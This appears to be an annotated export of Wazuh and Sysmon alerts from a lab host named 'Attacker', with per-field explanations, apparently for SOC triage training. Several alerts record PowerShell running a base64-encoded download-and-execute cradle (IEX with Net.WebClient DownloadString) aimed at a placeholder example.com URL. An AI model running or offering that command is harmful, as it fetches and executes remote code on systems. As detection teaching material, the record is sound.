rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.728840 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4706482Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260707 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.469
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-security-sddl-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.469
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.469 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-security-sddl-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.469 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is back to normal load. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 205 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534164.731946 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'normal'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: normal Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534166.732160 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:18.9512698Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 266202 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:31:18.668
ProcessGuid: {94294ddc-bbb6-680a-ba09-000000000e00}
ProcessId: 9932
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:31:18.668 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bbb6-680a-ba09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.737392 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:53.1717799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 279823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:32:52.033
ProcessGuid: {94294ddc-bc14-680a-020a-000000000e00}
ProcessId: 9372
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00}
ParentProcessId: 13080
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:32:52.033 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc14-680a-020a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.745458 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:59.8330733Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 279936 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:32:59.779
ProcessGuid: {94294ddc-bc1b-680a-0b0a-000000000e00}
ProcessId: 9120
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\WINDOWS\system32\cmd.exe" /Q /C ""C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\uninstall.cmd" --dir="C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00}
ParentProcessId: 8992
ParentImage: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
ParentCommandLine: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe" --system --windows-service --service=update-internal
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:32:59.779 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc1b-680a-0b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\system32\\cmd.exe\" /Q /C \"\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\uninstall.cmd\" --dir=\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8992 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe\" --system --windows-service --service=update-internal No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.751824 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of this event type. Sysmon adds fields in newer versions (ParentUser is one of them), so parsers should key on eventID plus version.
data.win.system.level: 4 Windows event level; 4 = Informational. Sysmon writes everything at this level, so it carries no severity signal.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:13.6930233Z When the record was written to the channel (UTC). Compare with eventdata.utcTime (when Sysmon observed the action); the one-second gap here is normal buffering, and the utcTime value is the one to put on the timeline.
data.win.system.eventRecordID: 280095 Incremental log record number – handy for timeline order.
